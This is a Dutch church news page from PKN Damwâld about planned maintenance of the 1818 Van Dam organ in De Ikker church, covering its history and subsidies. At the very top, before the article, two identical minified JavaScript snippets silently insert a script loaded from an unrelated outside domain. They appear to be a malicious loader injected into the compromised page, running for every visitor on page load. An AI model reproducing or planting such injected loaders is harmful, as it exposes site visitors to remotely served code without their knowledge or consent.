;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Onderhoud orgel De Ikker - PKN Damwâld

Onderhoud orgel De Ikker

Gepubliceerd op: dinsdag 19 april 2022

Het college van kerkrentmeesters van Hervormd Akkerwoude c.a. heeft besloten om het orgel van de Ikker een grote onderhoudsbeurt te geven. Besloten werd om orgeladviseur van het CVON, dhr. T. Jellema uit Leeuwarden, een rapport laten opstellen. Hij heeft vastgesteld wat er aan het orgel mankeert. De laatste grote onderhoudsbeurt is in 1977 uitgevoerd. Het is erg belangrijk om een orgel regelmatig te onderhouden om het in goede conditie en bespeelbaar te houden.
Het bijzondere orgel is gebouwd in 1818 door Lambertus van Dam. De kerk zelf is gebouwd in 1849 ter vervanging van een in slechte staat verkerend middeleeuws kerkgebouw. Boven de ingang van de kerk is een gedenksteen voor de eerste-steen-legging aangebracht door de zoon van predikant P. Kleffens, Lambert van Kleffens. Koning Willem II heeft toentertijd nog een bijdrage gedaan voor de nieuwbouw.
Het orgel is dus ouder dan de kerk zelf. Het heeft namelijk eerst dienst gedaan in de dorpskerk van ’s-Gravenzande. Toen daar een nieuwe kerk werd gebouwd heeft onze gemeente dit orgel in 1899 overgenomen. Het orgel is per schip overgebracht en uiteindelijk via de Ikkerwâldstervaart hier aan gekomen. Hoogst waarschijnlijk heeft er in de periode van 1849-1899 helemaal geen orgel in de kerk gezeten. Want in een oud rekeningenboek uit 1875 wordt een bijdrage vermeld voor een voorzanger!
Het orgel heeft inmiddels de status van rijksmonument. Hierdoor is het soms mogelijk om subsidie te ontvangen voor het onderhoud. Wij hebben zowel bij de provinsje Fryslân als bij de Rijksdienst voor het Cultureel Erfgoed subsidie aangevraagd. Dit heeft geresulteerd in de maximaal te behalen subsidie van 80%. Dit is natuurlijk fantastisch want op deze manier kunnen we met een geringe eigen bijdrage dit bijzondere orgel weer bij de tijd brengen.
Binnenkort zal er worden begonnen met de uitvoering. Mense Ruiter orgelmakers uit Ten Post gaat dit doen. Dit bedrijf heeft inmiddels bijna 100 jaar ervaring in het bouwen, onderhouden en restaureren van orgels.
Wanneer u een busje van dit bedrijf voor de Ikker ziet staan, schroom dan niet om even binnen te kijken. De orgelbouwers hebben aangegeven dat zij het erg leuk vinden om geïnteresseerden te woord te staan. Het geeft in ieder geval de mogelijkheid om eens een orgel van binnen te bekijken.